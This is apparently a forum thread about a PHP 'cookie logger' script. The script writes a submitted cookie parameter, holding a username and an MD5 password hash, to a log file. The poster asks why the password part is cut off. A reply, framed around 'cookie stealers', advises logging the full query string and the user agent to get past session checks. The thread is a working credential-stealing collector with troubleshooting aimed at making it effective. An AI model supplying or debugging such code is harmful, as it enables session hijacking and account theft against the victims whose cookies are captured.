I have a site that sets cookies with the format user=username&password=md5encryptedpassword so I set up a cookie logger:
<?php
$cookie = $_REQUEST["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n------------------------------\n");
?>
but for some reason, all that $cookie contains is up to user=username
the &password= doesn't show up. I have no idea why, can someone enlighten me as to why please and perhaps give me a workaround?

so of course it is going to pick up on anything else becuase you only asked for the cookie querystring value.

this is very common problem for the most cookie stealers - log the entire querystring not just a single value... oh a get the user agent also, some site use this to verify the user is who they say ther are